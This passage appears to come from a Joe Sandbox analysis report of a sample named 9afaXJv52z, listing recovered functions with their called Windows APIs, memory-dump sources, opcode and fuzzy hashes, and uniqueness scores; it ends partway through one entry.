Function 00007FF6850BC57C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6850BC598
RtlCaptureContext.KERNEL32 ref: 00007FF6850BC5C5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6850BC5DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6850BC620
IsDebuggerPresent.KERNEL32 ref: 00007FF6850BC674
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6850BC695
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6850BC6A0

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction ID: b91c03140b0665c515119bea7d51f3343ecf6325bf29916019fc924e26c7037f
Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction Fuzzy Hash: 5E315E76608A82C6EB609F60E8807ED7364FF84B54F44453EDA4D87A94DF38DA48CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CABD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6850CAC51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6850CAC69
RtlVirtualUnwind.KERNEL32 ref: 00007FF6850CACA4
IsDebuggerPresent.KERNEL32 ref: 00007FF6850CACDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6850CACE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6850CACF2

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction ID: 1d7ba7ec461bdfd8c15a5f7425df538f7a843542b63c8d2457f4cbeab443d4a9
Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction Fuzzy Hash: E6314136618B81C6DB60DF25E8403AE73A4FF89B64F540239EA9D83B55DF38D955CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D1EE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D1F30
FindFirstFileExW.KERNEL32 ref: 00007FF6850D203A

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction ID: b75db799e0484345d633d265e769021d8bf3a201aa6c4a834c9290289c4b3c5f
Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction Fuzzy Hash: C1B19F26B18697C1EE619B6298106B9A391FF54FF4F444239EE5E87A85DF3CEC41C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BC460 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6850BC48C
GetCurrentThreadId.KERNEL32 ref: 00007FF6850BC49A
GetCurrentProcessId.KERNEL32 ref: 00007FF6850BC4A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6850BC4B6

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction ID: 51c5f597f0156ae27849f5a98b889bfd792d7c4894e4b1cd2fe124a693a7eb29
Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction Fuzzy Hash: 40112E22B15F05CAEB00DF60E8542B933A4FB19B68F441E39DA6D867A4DF78D594C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D4280 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6850D42E6
memcpy_s.LIBCPMT ref: 00007FF6850D4311

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: af0d1a9f54264a61a71b7a5a8a4fb44b92b446a4a6645dd73b53342722154e35
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 90C10376B19286C7EB648F19A04467AB7A1FB94B94F458238DB4A8B744DF7DEC01CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D9FF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6850DA247
RaiseException.KERNEL32 ref: 00007FF6850DA258

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
Instruction ID: b97edf7d91f1072dd04aa8bffc973c975e2da6709fbb556a457a2c3d4a5411e6
Opcode Fuzzy Hash: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
Instruction Fuzzy Hash: DDB11A77608B85CBEB55CF29C8463687BA0FB44F58F198A25DA5D837A4CF3AD851C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C3AE4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6850C3C52
, xrefs: 00007FF6850C3E94

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
Instruction ID: 076b28fa690ee6dbd2f7bf1a15deb6ed89c915641ff33d0e782095e47eec12ff
Opcode Fuzzy Hash: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
Instruction Fuzzy Hash: 85E1A432A28646C6EB688E2591901BD33A0FF47F68F24513DDA0E877D4DF29EC51E750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CE4B0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF6850CE5BD
gfff, xrefs: 00007FF6850CE63A

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
Instruction ID: 34d2000ffd42d17b6b9495807f85fb35f6dee44c57f47a99f240b4dd7adfc3dc
Opcode Fuzzy Hash: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
Instruction Fuzzy Hash: 73517962B186C5C6E7258E3599047696B91FB46FA4F488239CBA887AC5DF3DDC40C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D0F38 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 4b7c577155937df3467bd9cdd4550942c9176b8fc8785c5dc3f7c97a7b0e1b3f
Instruction ID: 6027572c77e3bea409cbdf6da218c865363ce4cd6054547ce0920fbf034e2650
Opcode Fuzzy Hash: 4b7c577155937df3467bd9cdd4550942c9176b8fc8785c5dc3f7c97a7b0e1b3f
Instruction Fuzzy Hash: 2B025A21A0D643C1FA65AB61A8112792694BF42FF2F58473DED6EC67D2DE7CAC02C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CE01C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6850CE35E

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction ID: cf787570c031ccc2edd21b9c23b38aafcab080e7d0cf5899b4fc9b3311f0bfe0
Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction Fuzzy Hash: 02A11363A08785C6EB22CB25A4407AD7B91BF52BA4F048136DE8E8B785DF3DED01C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C86D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6850C86EF

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 69b463aaf0c9171a6bd530b887a7184897bfa98e9e25d66ef706b201926f197f
Instruction ID: 504f0da1a8787f7d4fc5cc49680dde79069b9907f511ffabe5abad3dcff246a2
Opcode Fuzzy Hash: 69b463aaf0c9171a6bd530b887a7184897bfa98e9e25d66ef706b201926f197f
Instruction Fuzzy Hash: 1C51A315F08642C1FA68EA265A1117A5291BF86FE4F48413DDE0DD7BD6EF3CEC06E218

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D3AF0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6850D3AF4

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
Instruction ID: 8fb516213bd4659bf59ea35d4e6a6612601fa502c498b8f1f40c35edf1ac2864
Opcode Fuzzy Hash: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
Instruction Fuzzy Hash: EBB09228E0BA46C2EB486B12AC8621422A47F88F21F98413CC10CC1320DE2C28B58B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C36E0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
Instruction ID: 37a3f12c98558a79832528b1d2fdac4f253bda11ccbf1702e69a59a1011b639f
Opcode Fuzzy Hash: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
Instruction Fuzzy Hash: 28D1B272A28642C6EB68CA2591442BD27A0FF06F68F14523DCE0D877D5CF39EC59E760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B8FD0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
Instruction ID: 6c3648ac3b2591e000b079929a740a22f587a748c7cece7a6b0299538bd3c111
Opcode Fuzzy Hash: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
Instruction Fuzzy Hash: 01C116322141F48BD698FB29E4A947A33E2FBA9309BD5403BEB8747785CA3CE414D751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C2D50 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
Instruction ID: 337bec595f6a91b6b6e37c3ef05c2e25ecfe05692cc5ce10a0cb664d8757f58e
Opcode Fuzzy Hash: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
Instruction Fuzzy Hash: 39B16C72918B46C5EB658F29C05427D3BA0FB4AF68F240139CA8E87795CF3ADC41D724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CEB30 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
Instruction ID: 8d2d8b084d59faef983295a826678290c8cc6cfb5c103294429a385931127f44
Opcode Fuzzy Hash: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
Instruction Fuzzy Hash: 3B81C172A0C78186E775CB19948137A6A91FF46BA4F144239DA8E87B99DF3DEC40CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D6D70 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f79d7b8a4b9136362ee4687d07e980b4a2c8ab22ab714f4d6b7b90f4866350ce
Instruction ID: 7bf0103078d47983765ddf682380cab7803057d95bf631da662da9b42e11b530
Opcode Fuzzy Hash: f79d7b8a4b9136362ee4687d07e980b4a2c8ab22ab714f4d6b7b90f4866350ce
Instruction Fuzzy Hash: F861D122E1C692C6FB64CA68C451279A691BF40BB0F95073DFA2DC7AC5DE7EEC05C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C1E94 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction ID: df81144ef4e900c59ac3ff72606b5d4d0f18f6edef5307b13a36f0c67bb772ee
Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction Fuzzy Hash: 4D514136A18652C6EB248B29C04522927A0FF56FB9F344139DE8D977A5CF3AEC43C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C1A84 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction ID: a60197114c4b49b7398c29f84c5daf8f5b24eb30345377d1dc48045e3ab3233a
Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction Fuzzy Hash: 11516476A18A51C6E7248B29C04422933A0FF86FB9F244139DA4D977A4DF3AEC53CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C22A4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

